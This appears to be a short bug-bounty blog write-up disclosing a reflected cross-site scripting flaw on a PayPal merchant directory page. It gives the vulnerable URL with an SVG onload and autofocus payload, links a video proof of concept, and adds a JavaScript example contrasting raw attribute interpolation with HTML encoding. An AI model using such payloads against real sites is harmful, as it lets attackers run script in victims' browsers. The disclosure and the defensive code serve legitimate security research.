
Saturday, 18 April 2015

Reflected Cross Site Scripting at Paypal.com [BugBounty] Writeup by Hamid Ashraf


Hello guys, this is Hamid Ashraf (hami hax). I found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants) with the following payload: https://www.paypal.com/directory/merchants?q=&q=509%22%20src= xss


payload 

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=
"><svg/onload=prompt(2)>""<input onfocus=alret(2)"autofocus



Video POC
http://tune.pk/video/5648557/Reflected-Cross-Site-Scripting-at-Paypalcom-BugBounty
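
On the defensive side, this class of bug is closed by encoding the reflected value for the context it lands in. The sketch below is an added example, not code from PayPal or from the author. It assumes the q value is echoed into a quoted HTML attribute (the write-up does not say where it is reflected), and all function names are hypothetical.

```javascript
// Added example (not PayPal's code). Assumption: the search term q is echoed
// into a quoted HTML attribute; the write-up does not state the sink.

// Encode a value for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#39;", "`": "&#96;",
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// The request in the write-up carries q twice (?q=&q=...). Resolve a repeated
// parameter to one value in one place, so that any validation and the
// template both operate on the same string.
function singleParam(searchParams, name) {
  const values = searchParams.getAll(name);
  return values.length === 0 ? "" : values[values.length - 1];
}

// Vulnerable form (hypothetical): raw interpolation lets a double quote in q
// close the value attribute and start a new one.
function renderSearchBoxUnsafe(url) {
  const q = singleParam(new URL(url).searchParams, "q");
  return `<input type="text" name="q" value="${q}">`;
}

// Hardened form: the same template with the value encoded at output time.
function renderSearchBox(url) {
  const q = singleParam(new URL(url).searchParams, "q");
  return `<input type="text" name="q" value="${escapeHtml(q)}">`;
}

// Sample request: the first URL quoted in the write-up.
const SAMPLE_URL =
  "https://www.paypal.com/directory/merchants?q=&q=509%22%20src=";

console.log(renderSearchBoxUnsafe(SAMPLE_URL)); // quote escapes the attribute
console.log(renderSearchBox(SAMPLE_URL));       // quote rendered as &quot;
```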

Hope you enjoyed! If you have any kind of question, please don’t hesitate to ask me, either here or via email at hamihax@gmail.com
